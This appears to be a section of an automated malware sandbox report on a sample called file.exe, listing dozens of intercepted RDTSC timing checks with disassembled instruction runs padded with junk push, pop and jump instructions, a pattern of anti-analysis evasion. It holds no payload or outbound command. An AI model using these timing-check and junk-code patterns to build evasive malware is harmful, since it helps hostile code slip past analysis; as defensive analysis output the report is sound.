                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A4A44 second address: 6A4A50 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a push edx 0x0000000b pop edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A4A50 second address: 6A4A5C instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F7174BA6FD6h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A4A5C second address: 6A4A67 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jnp 00007F7174CEBA86h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A4A67 second address: 6A4A9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a push edi 0x0000000b pop edi 0x0000000c push edi 0x0000000d pop edi 0x0000000e jmp 00007F7174BA6FE3h 0x00000013 popad 0x00000014 jno 00007F7174BA6FE2h 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A4A9B second address: 6A4ABF instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F7174CEBA94h 0x00000008 push eax 0x00000009 push edx 0x0000000a jc 00007F7174CEBA86h 0x00000010 jne 00007F7174CEBA86h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A4ABF second address: 6A4AC5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A4C12 second address: 6A4C16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A4C16 second address: 6A4C1A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A4DB5 second address: 6A4DBA instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A4DBA second address: 6A4DC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A50CB second address: 6A50D9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop edi 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A50D9 second address: 6A50DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A610E second address: 6A6131 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007F7174CEBA97h 0x00000008 pop eax 0x00000009 jl 00007F7174CEBA92h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A3F3E second address: 6A3F7A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7174BA6FE4h 0x00000007 jng 00007F7174BA6FE2h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F7174BA6FE0h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6AB8E9 second address: 6AB8EE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6AB8EE second address: 6AB8F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F5C5D second address: 5F5C8E instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jmp 00007F7174CEBA90h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ecx 0x0000000c jmp 00007F7174CEBA96h 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 pop eax 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F5C8E second address: 5F5C92 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6BE072 second address: 6BE076 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6BE207 second address: 6BE211 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F7174BA6FD6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6BE211 second address: 6BE215 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6BE215 second address: 6BE21B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6BE21B second address: 6BE221 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6BE221 second address: 6BE227 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6BE227 second address: 6BE247 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jc 00007F7174CEBA9Eh 0x0000000c jmp 00007F7174CEBA92h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C0900 second address: 6C0906 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C0906 second address: 6C0915 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 push ebx 0x00000008 jbe 00007F7174CEBA86h 0x0000000e pop ebx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C209E second address: 6C20AC instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jns 00007F7174BA6FD6h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6CEB99 second address: 6CEB9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D7698 second address: 6D76A2 instructions: 0x00000000 rdtsc 0x00000002 js 00007F7174BA6FF5h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D76A2 second address: 6D76E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7174CEBA99h 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c jmp 00007F7174CEBA90h 0x00000011 popad 0x00000012 pop edx 0x00000013 pop eax 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 js 00007F7174CEBA86h 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D76E0 second address: 6D76FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F7174BA6FE5h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D634C second address: 6D6368 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F7174CEBA86h 0x0000000a jmp 00007F7174CEBA8Dh 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D6368 second address: 6D636C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D636C second address: 6D6370 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D6370 second address: 6D6394 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push edi 0x0000000b pop edi 0x0000000c jmp 00007F7174BA6FE8h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D6394 second address: 6D63BA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7174CEBA94h 0x00000007 jnl 00007F7174CEBA86h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jo 00007F7174CEBA8Ch 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D63BA second address: 6D63C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D63C5 second address: 6D63CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D63CB second address: 6D63CF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D63CF second address: 6D63E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F7174CEBA8Ah 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D63E1 second address: 6D63E7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D63E7 second address: 6D6400 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7174CEBA95h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D73A8 second address: 6D73BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 jmp 00007F7174BA6FE1h 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D73BF second address: 6D73C3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D73C3 second address: 6D73CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D73CE second address: 6D73E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 jo 00007F7174CEBAA6h 0x0000000d jns 00007F7174CEBA88h 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D73E7 second address: 6D73EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D73EB second address: 6D73F5 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F7174CEBA86h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6DC1CB second address: 6DC1CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6DC1CF second address: 6DC1D3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6DC33A second address: 6DC367 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jng 00007F7174BA6FD6h 0x0000000c jnl 00007F7174BA6FD6h 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 pop eax 0x00000017 jmp 00007F7174BA6FE6h 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6DC367 second address: 6DC38B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 pushad 0x00000008 popad 0x00000009 push esi 0x0000000a pop esi 0x0000000b pop edi 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F7174CEBA93h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6DC38B second address: 6DC38F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6DC38F second address: 6DC3A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7174CEBA90h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6DC3A5 second address: 6DC3AA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6DC3AA second address: 6DC3B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6E4F3E second address: 6E4F46 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6E4F46 second address: 6E4F4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6E88C0 second address: 6E88CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F7174BA6FD6h 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6F4A53 second address: 6F4A6D instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jmp 00007F7174CEBA8Dh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FF8DC second address: 6FF8E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F7174BA6FD8h 0x0000000a push edx 0x0000000b pop edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FFBCC second address: 6FFBD0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FFBD0 second address: 6FFBD9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FFBD9 second address: 6FFBEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7174CEBA8Bh 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FFD73 second address: 6FFD90 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F7174BA6FE8h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FFD90 second address: 6FFDAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7174CEBA90h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push edi 0x0000000d pop edi 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FFDAB second address: 6FFDAF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FFF2B second address: 6FFF30 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 700655 second address: 70065B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 700796 second address: 70079B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 70079B second address: 7007A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7007A0 second address: 7007A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7007A6 second address: 7007B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a jnl 00007F7174BA6FD6h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7037E5 second address: 7037EB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 703AC7 second address: 703AD5 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F7174BA6FD6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 707368 second address: 70736C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 708F02 second address: 708F08 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 708F08 second address: 708F12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 708F12 second address: 708F16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 708F16 second address: 708F1A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 708F1A second address: 708F20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A11B3A second address: 4A11B77 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007F7174CEBA94h 0x0000000a xor ax, 58F8h 0x0000000f jmp 00007F7174CEBA8Bh 0x00000014 popfd 0x00000015 popad 0x00000016 xchg eax, ecx 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a jmp 00007F7174CEBA8Bh 0x0000001f mov ah, A1h 0x00000021 popad 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A11B77 second address: 4A11B99 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7174BA6FE2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 call dword ptr [74E5188Ch] 0x0000000f mov edi, edi 0x00000011 push ebp 0x00000012 mov ebp, esp 0x00000014 push ecx 0x00000015 mov ecx, dword ptr [7FFE0004h] 0x0000001b mov dword ptr [ebp-04h], ecx 0x0000001e cmp ecx, 01000000h 0x00000024 jc 00007F7174BD8AB5h 0x0000002a mov eax, 7FFE0320h 0x0000002f mov eax, dword ptr [eax] 0x00000031 mul ecx 0x00000033 shrd eax, edx, 00000018h 0x00000037 mov esp, ebp 0x00000039 pop ebp 0x0000003a ret 0x0000003b push eax 0x0000003c push edx 0x0000003d push eax 0x0000003e push edx 0x0000003f push eax 0x00000040 push edx 0x00000041 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A11B99 second address: 4A11B9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A11B9D second address: 4A11BBA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7174BA6FE9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A11BBA second address: 4A11BEF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dx, BA32h 0x00000007 jmp 00007F7174CEBA93h 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pop ecx 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F7174CEBA95h 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A11BEF second address: 4A11A6F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7174BA6FE1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 ret 0x0000000a nop 0x0000000b xor esi, eax 0x0000000d lea eax, dword ptr [ebp-10h] 0x00000010 push eax 0x00000011 call 00007F71791AF2BBh 0x00000016 mov edi, edi 0x00000018 pushad 0x00000019 popad 0x0000001a push ecx 0x0000001b pushad 0x0000001c push eax 0x0000001d push edx 0x0000001e mov cx, FBF7h 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A118D4 second address: 4A11947 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7174CEBA99h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F7174CEBA91h 0x0000000f xchg eax, ebp 0x00000010 pushad 0x00000011 mov di, si 0x00000014 pushfd 0x00000015 jmp 00007F7174CEBA98h 0x0000001a add ch, FFFFFF88h 0x0000001d jmp 00007F7174CEBA8Bh 0x00000022 popfd 0x00000023 popad 0x00000024 mov ebp, esp 0x00000026 push eax 0x00000027 push edx 0x00000028 push eax 0x00000029 push edx 0x0000002a jmp 00007F7174CEBA90h 0x0000002f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A11947 second address: 4A11956 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7174BA6FDBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49E06D3 second address: 49E06D7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49E06D7 second address: 49E06DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49E06DD second address: 49E0782 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F7174CEBA98h 0x00000009 or ax, 4958h 0x0000000e jmp 00007F7174CEBA8Bh 0x00000013 popfd 0x00000014 pushfd 0x00000015 jmp 00007F7174CEBA98h 0x0000001a sub ecx, 38C353B8h 0x00000020 jmp 00007F7174CEBA8Bh 0x00000025 popfd 0x00000026 popad 0x00000027 pop edx 0x00000028 pop eax 0x00000029 xchg eax, ebp 0x0000002a jmp 00007F7174CEBA96h 0x0000002f push eax 0x00000030 jmp 00007F7174CEBA8Bh 0x00000035 xchg eax, ebp 0x00000036 jmp 00007F7174CEBA96h 0x0000003b mov ebp, esp 0x0000003d push eax 0x0000003e push edx 0x0000003f push eax 0x00000040 push edx 0x00000041 jmp 00007F7174CEBA8Ah 0x00000046 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49E0782 second address: 49E0786 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49E0786 second address: 49E078C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49E0816 second address: 49E082E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7174BA6FE4h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49E082E second address: 49E0832 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
